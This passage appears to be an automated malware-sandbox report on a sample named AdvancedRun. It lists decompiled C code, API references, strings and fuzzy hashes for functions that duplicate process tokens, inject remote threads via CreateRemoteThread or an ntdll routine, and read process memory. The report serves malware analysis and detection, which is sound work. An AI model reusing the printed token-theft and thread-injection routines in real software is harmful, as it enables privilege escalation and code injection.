CloseHandle.KERNEL32(00000000), ref: 0040A648
memset.MSVCRT ref: 0040A66E
ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
FreeLibrary.KERNEL32(?), ref: 0040A6DC
GetLastError.KERNEL32 ref: 0040A6E4
GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1

Strings

kernel32.dll, xrefs: 0040A4BB
D, xrefs: 0040A528
GetLastError, xrefs: 0040A4FE
CreateProcessW, xrefs: 0040A4DD

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
String ID: CreateProcessW$D$GetLastError$kernel32.dll
API String ID: 1572607441-20550370
Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}

0x004028a3
0x004028ab
0x004028bd
0x004028ca
0x004028d7
0x004028e3
0x004028e6
0x004028e8
0x00000000
0x004028eb
0x004028ec

APIs

LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6

Strings

DuplicateTokenEx, xrefs: 004028DB
OpenProcessToken, xrefs: 004028CF
CreateProcessWithLogonW, xrefs: 004028B7
advapi32.dll, xrefs: 004028A6
CreateProcessWithTokenW, xrefs: 004028C2

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoad
String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
API String ID: 2238633743-1970996977
Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}

0x0040a27d
0x0040a286
0x0040a290
0x0040a29d
0x00000000
0x0040a32f
0x0040a29f
0x0040a2a4
0x0040a2ad
0x0040a2b6
0x0040a2bc
0x0040a2be
0x0040a2c4
0x0040a2c8
0x0040a2ce
0x0040a2e3
0x0040a2ed
0x0040a2fb
0x0040a2fe
0x0040a305
0x0040a30c
0x0040a30f
0x0040a313
0x00000000
0x0040a31a
0x0040a338

APIs

GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F

Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263

Strings

$, xrefs: 0040A2E3

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
String ID: $
API String ID: 283512611-3993045852
Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}

0x00401093
0x00401096
0x00401097
0x0040109b
0x004010a3
0x004010a5
0x00401270
0x00401278
0x004012b3
0x0040127a
0x00401293
0x004012a2
0x004012a2
0x004012c1
0x004012d9
0x004012ea
0x004012ec
0x004012f6
0x00000000
0x004010ab
0x004010ab
0x004010ac
0x00401231
0x00401236
0x00401239
0x0040123d
0x00401249
0x00401249
0x0040124c
0x00000000
0x00401252
0x00401259
0x00401265
0x00000000
0x00401265
0x0040123f
0x0040123f
0x00401243
0x00000000
0x00000000
0x00000000
0x00000000
0x00401243
0x004010b2
0x004010b2
0x004010b5
0x004011e1
0x004011e3
0x004011e6
0x0040120e
0x00401216
0x00000000
0x0040121c
0x00401224
0x00401226
0x00401229
0x00000000
0x0040122f
0x00000000
0x0040122f
0x00401229
0x004011e8
0x004011e8
0x004011ed
0x004011fb
0x00401203
0x00401203
0x004010bb
0x004010bb
0x004010c0
0x00401151
0x0040115a
0x00401168
0x0040116b
0x0040116e
0x00401170
0x00401173
0x00401180
0x00401182
0x00401185
0x004011a4
0x004011ac
0x00000000
0x004011b2
0x004011ba
0x004011bc
0x004011c7
0x004011c9
0x004011cb
0x00000000
0x004011d1
0x00000000
0x004011d1
0x004011cb
0x00401187
0x00401187
0x00401199
0x00000000
0x00401199
0x004010c6
0x004010c8
0x004012fd
0x004012fd
0x004012fd
0x004010ce
0x004010ce
0x004010d7
0x004010e5
0x004010e8
0x004010eb
0x004010ed
0x004010f0
0x00401102
0x0040111d
0x00401125
0x00000000
0x0040112b
0x00401133
0x00401135
0x00401140
0x00401142
0x00401144
0x00000000
0x0040114a
0x0040114a
0x00000000
0x0040114a
0x00401144
0x00401104
0x0040110a
0x0040110b
0x0040110b
0x0040110e
0x00401115
0x00401117
0x00401117
0x00401102
0x004010c8
0x004010c0
0x004010b5
0x004010ac
0x00401303

APIs

GetDlgItem.USER32 ref: 004010EB
ChildWindowFromPoint.USER32 ref: 004010FD
GetDlgItem.USER32 ref: 00401133
ChildWindowFromPoint.USER32 ref: 00401140
GetDlgItem.USER32 ref: 0040116E
ChildWindowFromPoint.USER32 ref: 00401180
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 00401189
LoadCursorW.USER32(00000000,00000067), ref: 00401192
SetCursor.USER32(00000000,?,?), ref: 00401199
GetDlgItem.USER32 ref: 004011BA
ChildWindowFromPoint.USER32 ref: 004011C7
GetDlgItem.USER32 ref: 004011E1
SetBkMode.GDI32(?,00000001), ref: 004011ED
SetTextColor.GDI32(?,00C00000), ref: 004011FB
GetSysColorBrush.USER32(0000000F), ref: 00401203
GetDlgItem.USER32 ref: 00401224
EndDialog.USER32(?,?), ref: 00401259
DeleteObject.GDI32(?), ref: 00401265
GetDlgItem.USER32 ref: 0040128A
ShowWindow.USER32(00000000), ref: 00401293
GetDlgItem.USER32 ref: 0040129F
ShowWindow.USER32(00000000), ref: 004012A2
SetDlgItemTextW.USER32 ref: 004012B3
SetWindowTextW.USER32(?,AdvancedRun), ref: 004012C1
SetDlgItemTextW.USER32 ref: 004012D9
SetDlgItemTextW.USER32 ref: 004012EA

Strings

AdvancedRun, xrefs: 004012B9

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID: AdvancedRun
API String ID: 829165378-481304740
Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18

Uniqueness

Uniqueness Score: -1.00%

Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8; // 0x0
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc; // 0x0
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}

0x00408ae3
0x00408aeb
0x00408af3
0x00408b76
0x00408b8a
0x00408b91
0x00408b98
0x00408bb1
0x00408bb3
0x00408bc6
0x00408bcc
0x00408bda
0x00408be0
0x00408bf3
0x00408bfa
0x00408c0b
0x00408c12
0x00408c17
0x00408c1a
0x00408c2c
0x00408c39
0x00408c3d
0x00408c3f
0x00408c41
0x00408c52
0x00408c58
0x00408c58
0x00408c6f
0x00408c71
0x00408c73
0x00408c83
0x00408c89
0x00408c89
0x00408c8a
0x00408c8f
0x00408c91
0x00408c9a
0x00408c93
0x00408c93
0x00408c93
0x00408c9f
0x00408ca5
0x00408caf
0x00408cbc
0x00408cc2
0x00408cc7
0x00408ccd
0x00408cd0
0x00408cd6
0x00408cd7
0x00408cd8
0x00408cde
0x00408ce3
0x00408ceb
0x00408cfe
0x00408d03
0x00408d06
0x00408d0c
0x00408d21
0x00408d27
0x00408d0c
0x00000000
0x00408ca7
0x00408ca7
0x00408cad
0x00408d28
0x00408d2e
0x00408d35
0x00408d36
0x00408d42
0x00408d48
0x00408d4e
0x00408d54
0x00408d5a
0x00408d60
0x00408d66
0x00408d6c
0x00408d72
0x00408d73
0x00408d7f
0x00408d85
0x00408d8a
0x00408d8f
0x00408d90
0x00408da8
0x00408db9
0x00408dbf
0x00408dc5
0x00408dc5
0x00000000
0x00408cad
0x00408ca5
0x00408af6
0x00408afc
0x00408b07
0x00408b2a
0x00408b38
0x00408b53
0x00408b56
0x00408b62
0x00408b6a
0x00408b6a
0x00408b2a
0x00408b07
0x00000000

APIs

EndDialog.USER32(?,?), ref: 00408B20
GetDlgItem.USER32 ref: 00408B38
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00408B56
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00408B62
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00408B6A
memset.MSVCRT ref: 00408B91
memset.MSVCRT ref: 00408BB3
memset.MSVCRT ref: 00408BCC
memset.MSVCRT ref: 00408BE0
memset.MSVCRT ref: 00408BFA
memset.MSVCRT ref: 00408C12
GetCurrentProcess.KERNEL32 ref: 00408C1A
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 00408C3D
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00408C6F
memset.MSVCRT ref: 00408CC2
GetCurrentProcessId.KERNEL32 ref: 00408CD0
memcpy.MSVCRT ref: 00408CFE
wcscpy.MSVCRT ref: 00408D21
_snwprintf.MSVCRT ref: 00408D90
SetDlgItemTextW.USER32 ref: 00408DA8
GetDlgItem.USER32 ref: 00408DB2
SetFocus.USER32(00000000), ref: 00408DB9

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
{Unknown}, xrefs: 00408BA5

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68

Uniqueness

Uniqueness Score: -1.00%

Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

0x0040b04d
0x0040b05e
0x0040b060
0x0040b063
0x0040b06a
0x0040b06d
0x0040b076
0x0040b07b
0x0040b07e
0x0040b084
0x0040b08e
0x0040b0a8
0x0040b0aa
0x0040b0ad
0x0040b0b0
0x0040b0b3
0x0040b0b6
0x0040b0b8
0x0040b0bb
0x0040b0be
0x0040b0c1
0x0040b0c4
0x0040b0c7
0x0040b0ca
0x0040b0cd
0x0040b0cd
0x0040b0e5
0x0040b11f
0x0040b128
0x0040b0e7
0x0040b0e7
0x0040b0f1
0x0040b0f2
0x0040b0f3
0x0040b0fb
0x0040b0fd
0x0040b0fe
0x0040b11d
0x00000000
0x00000000
0x0040b11d
0x0040b13c
0x0040b151
0x0040b166
0x0040b17b
0x0040b190
0x0040b1a5
0x0040b1ba
0x0040b1cf
0x0040b1d6
0x0040b1d7
0x0040b1d8
0x0040b1de
0x0040b1e3

APIs

GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
??2@YAPAXI@Z.MSVCRT ref: 0040B07E
GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
_snwprintf.MSVCRT ref: 0040B0FE
wcscpy.MSVCRT ref: 0040B128
??3@YAXPAX@Z.MSVCRT ref: 0040B1D8

Strings

OriginalFileName, xrefs: 0040B1BF
LegalCopyright, xrefs: 0040B1AA
ProductName, xrefs: 0040B12F
FileVersion, xrefs: 0040B156
040904E4, xrefs: 0040B122
\VarFileInfo\Translation, xrefs: 0040B0D8
ProductVersion, xrefs: 0040B16B
CompanyName, xrefs: 0040B180
FileDescription, xrefs: 0040B141
%4.4X%4.4X, xrefs: 0040B0F3
InternalName, xrefs: 0040B195

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
